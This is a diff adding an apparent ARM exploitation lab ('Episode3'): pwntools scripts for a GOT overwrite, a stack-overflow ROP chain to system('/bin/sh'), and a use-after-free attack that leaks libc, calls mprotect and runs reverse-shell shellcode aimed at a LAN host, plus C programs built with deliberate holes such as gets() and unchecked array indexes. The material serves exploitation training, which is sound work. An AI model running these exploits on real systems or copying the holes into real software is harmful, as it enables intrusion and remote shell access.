Episode3

Episode3/exploits/exploit_got.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python2
+
+from pwn import *
+
+ip = "192.168.0.13"
+port = 22
+user = "pi"
+pwd = "toSet"
+
+libc = ELF('libc-2.24.so')
+gadget_offset = 0xed748
+
+shell = ssh(user, ip, password=pwd, port=port)
+
+sh = shell.run('/home/pi/arm/episode3/got_overw')
+
+# fill the array
+sh.recvuntil('array:\n')
+sh.sendline('1852400175') # "nib/"
+sh.sendline('6845231')    # "hs/"
+for i in range(0,10):
+	sh.sendline(str(i))
+
+sh.recvuntil('read: \n')
+
+# Leak the libc address
+sh.sendline('-9')  # offset to the libc in the GOT section
+ret = sh.recvline().split()
+libc_main = int(ret[6])
+# libc_base = libc_main - libc_base_offset
+libc_base = libc_main - libc.symbols['__libc_start_main']
+log.info('libcbase: %#x' % libc_base)
+# address of the system function
+system_addr = libc_base + libc.symbols['system']
+log.info('system address: %#x' % system_addr)
+
+sh.recvuntil('[y/n]\n')
+# do not read other values
+sh.sendline('n')
+
+sh.recvuntil('modify?\n')
+# send the system function address
+sh.sendline(str(system_addr))
+sh.recvuntil('modify\n')
+sh.sendline('-10')  # offset of the put in the GOT section
+sh.recvuntil('value\n')
+# gadget address
+gadget_address = libc_base + gadget_offset
+log.info('gadget address: %#x' % gadget_address)
+# send the gadget address
+sh.sendline(str(gadget_address))
+
+sh.interactive()
+
+shell.close()

Episode3/exploits/exploit_stack_overf.py

@@ -0,0 +1,46 @@
+#!/usr/bin/env python2
+
+from pwn import *
+
+ip = "192.168.0.13"
+port = 22
+user = "pi"
+pwd = "toSet"
+
+libc = ELF('libc-2.24.so')
+
+shell = ssh(user, ip, password=pwd, port=port)
+
+sh = shell.run('/home/pi/arm/episode3/stack_overflow')
+
+payload = "A"*64
+payload += p32(0x1)       # r0 - standard output
+payload += p32(0x1046C)   # rop gadget pop {r0, r1, r2, lr}; bx lr
+payload += p32(0x2100c)   # r1 - address of read
+payload += p32(0x4)       # r2 - number of bytes to write
+payload += p32(0x104C8)   # lr - address of write
+payload += p32(0x00)      # not used
+payload += p32(0x10488)   # jump to the read  - 0x104d4 <main+36>        pop    {r11,  pc}
+sh.sendline(payload)
+
+# get the read address
+read_address = u32(sh.recv(4))
+log.info('address of the read: %#x' % read_address)
+# get the libc_base address
+libc_base_address = read_address - libc.symbols['read']
+# get the system address 
+system_address = libc_base_address + libc.symbols['system']
+log.info('address of the system: %#x' % system_address)
+shell_address = libc_base_address + next(libc.search("/bin/sh"))
+
+payload = "A"*64
+payload += p32(shell_address)       # r0 - /bin/sh address
+payload += p32(0x1046C)             # rop gadget pop {r0, r1, r2, lr}; bx lr
+payload += p32(0x00)                # r1 - not used
+payload += p32(0x00)                # r2 - not used
+payload += p32(system_address)      # lr - address of the system
+sh.sendline(payload)
+
+sh.interactive()
+
+shell.close()

Episode3/exploits/uaf_exploit.py

@@ -0,0 +1,132 @@
+#!/usr/bin/env python2
+from pwn import *
+import pwnlib.asm as asm
+import pwnlib.elf as elf
+
+ip = "192.168.0.13"
+port = 4444
+
+PAGE_SIZE = 0x1000
+
+def find_arm_gadget(e, gadget):
+  gadget_bytes = asm.asm(gadget, arch='arm')
+  gadget_address = None
+  for address in e.search(gadget_bytes):
+    if address % 4 == 0:
+      gadget_address = address
+      if gadget_bytes == e.read(gadget_address, len(gadget_bytes)):
+        log.info(asm.disasm(gadget_bytes, vma=gadget_address, arch='arm'))
+        break
+  return gadget_address
+
+def find_thumb_gadget(e, gadget):
+  gadget_bytes = asm.asm(gadget, arch='thumb')
+  gadget_address = None
+  for address in e.search(gadget_bytes):
+    if address % 2 == 0:
+      gadget_address = address + 1
+      if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)):
+        log.info(asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb'))
+        break
+  return gadget_address
+
+def find_gadget(e, gadget):
+  gadget_address = find_thumb_gadget(e, gadget)
+  if gadget_address is not None:
+    return gadget_address
+  return find_arm_gadget(e, gadget)
+
+# libc file
+libc = ELF('libc-2.24.so')
+
+s = remote(ip, port)
+
+log.info('-----------------------------------------------')
+
+#####LEAK#####
+offset = 0x32df0c
+s.sendline('9')
+leak_value = s.recvuntil("area")
+# arbitrary read
+s.sendline('0x%08x.0x%08x.0x%08x')
+leak_values = s.recvuntil("done!")
+wel_msg = int(leak_values[76:84], 16)
+roulette_add = int(leak_values[109:114], 16)
+stack_address = int(leak_values[13:23], 16)
+
+log.info("The wel_msg address is: 0x%x", wel_msg)
+log.info("The roulette address is: 0x%x", roulette_add)
+log.info("The leak_address: 0x%x", stack_address)
+
+# libc base address
+libc_base = stack_address - offset
+log.info("Libc base address: 0x%x", libc_base)
+
+# mprotect address
+mprotect_address = libc_base + libc.symbols['mprotect']
+log.info('mprotect address 0x%x' % mprotect_address)
+
+# gadget address
+libc.address = libc_base
+pop_r0_r1_r2_r3_r4_pc = find_gadget(libc, 'pop {r0, r1, r2, r3, r4, pc}')
+
+# insert note "AAAA"
+s.sendline('1')
+s.sendline('A'*4)
+# insert address of wel_msg as note 
+s.sendline('1')
+s.sendline(p32(wel_msg))
+# insert note "BBBB"
+s.sendline('1')
+s.sendline('B'*4)
+
+# reverse shell shellcode + "\x33"
+shellcode = "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0e\x1b\x01\x00\x00\x33"
+
+# len of the new stack
+stack_len = 40
+stack = ""
+# set LR
+stack += p32(wel_msg + 36) #LR = address of the shellcode
+# gadget 2 - 76d6bb08: pop {r0, r1, r2, r3, r4, pc}
+stack += p32(pop_r0_r1_r2_r3_r4_pc)  # thumb address
+# r0 = (wel_msg / PAGE_SIZE ) * PAGE_SIZE
+stack += p32((wel_msg / PAGE_SIZE) * PAGE_SIZE)
+# r1 = 0x100
+stack += p32(0x100)
+# r2 = 0x7
+stack += p32(0x07) #RWX
+# r3 = 0x00
+stack += p32(0x00)
+# r4 = 0x00
+stack += p32(0x00)
+# r5 = mprotect addres
+stack += p32(mprotect_address)
+stack += "ZZZZ"
+# change the wel_msg value
+s.sendline('0')
+s.sendline(stack + shellcode)
+ret = s.recvuntil("message")
+sleep(1)
+
+# objdump -d uaf | grep stack_pivot
+# 000111cc <_Z11stack_pivotv>:
+roulette_value = 0x111cc  # address of the stack_pivot function
+# delete edit_obj
+s.sendline('4')
+s.sendline(str(roulette_value))
+ret = s.recvuntil("message")
+sleep(1)
+
+# allocare the hole - set_address()
+s.sendline('5')
+s.sendline(str(roulette_add))
+ret = s.recvuntil("message")
+sleep(1)
+
+# take control - show all note
+s.sendline('2')
+ret = s.recvuntil("message")
+sleep(1)
+
+s.close()

Episode3/got_overw.c

@@ -0,0 +1,86 @@
+#include <stdio.h>
+#include <math.h>
+
+#define MAX 12
+#define PI 3.14159265
+
+int main()
+{
+  static int arr[MAX];
+  char ch;
+  int num, ret;
+  int flag=1;
+  unsigned int i, in_num, out_num, cos_param, write_index;
+
+  printf("Please fill the array:\n");
+
+  for(i=0;i<MAX;i++){
+    if(scanf("%d", &in_num)==1){
+      arr[i]=in_num;
+    }
+    else{
+      printf("Please enter a number\n");
+      return 0;
+    }
+  }
+
+  while(flag){
+    printf("Select the index of the element that you want to read: \n");
+
+    if(scanf("%d", &num)!=1){
+      printf("Please enter a number\n");
+      return 0;
+    }
+
+    printf("At position %d the value is %d\n", num, arr[num]);
+
+    printf("Do you want read another number? [y/n]\n");
+
+    scanf(" %c", &ch);
+
+    if(ch!='y'){
+      flag=0;
+    }
+  }
+
+  printf("How many value do you want to modify?\n");
+
+  if(scanf("%d", &cos_param)!=1){
+      printf("Please enter a number:\n");
+      return 0;
+  }
+  //param 180
+  ret = cos(cos_param * PI /180.0);
+
+  if (ret<0){
+  	write_index = MAX;
+  }
+  else
+  {
+  	write_index = 1;
+  }
+
+  while(write_index){
+    if(flag!=0){
+      printf("Do you want to edit some value in the array? [y/n]\n");
+      scanf(" %c", &ch);
+    }
+
+    if(ch=='y' || flag==0){
+      printf("Select the index of the element that you want to modify\n");
+      scanf("%d", &num);
+
+      printf("Enter the new value\n");
+      scanf("%d", &out_num);
+
+      arr[num]=out_num;
+      write_index--;
+      flag=1;
+    }
+    else{
+      break;
+    }
+  }
+  printf("Good done!\n");
+  return 0;
+ }

Episode3/redirect_execution.c

@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <string.h>
+
+char msgSecret[] = "This is the secret message";
+char msgDefault[] = "This is the default message";
+
+typedef struct _msg_struct
+{
+  char message[32];
+  int (*print_msg)();
+}msg_struct;
+
+int print_secr()
+{
+  printf("Congrats! %s\n", msgSecret);
+  return 0;
+}
+
+int print_default()
+{
+  printf("Hello! %s\n", msgDefault);
+  return 0;
+}
+
+int main(int argc, char **argv)
+{
+  char message[80];
+  msg_struct p;
+
+  printf("Please enter a message: \n"); 
+
+  gets(message);
+
+  if(*message)
+  {
+    p.print_msg=print_default; 
+    strcpy(p.message, message);
+    p.print_msg();
+  }
+  else
+  {
+    printf("Insert the message!\n");
+  }
+
+  return 0;
+}
+

Episode3/stack1.c

@@ -0,0 +1,24 @@
+#include <stdio.h>
+
+char pwdSecret[] = "stack123!";
+
+void print_secr()
+{
+  printf("Password is %s\n", pwdSecret);
+}
+
+int main(int argc, char **argv)
+{
+  int check=0;
+  char buffer[32];
+
+  gets(buffer);
+
+  if(check == 0x74696445) {
+    print_secr();
+  } 
+  else 
+  {
+    printf("No password to show\n");
+  }
+}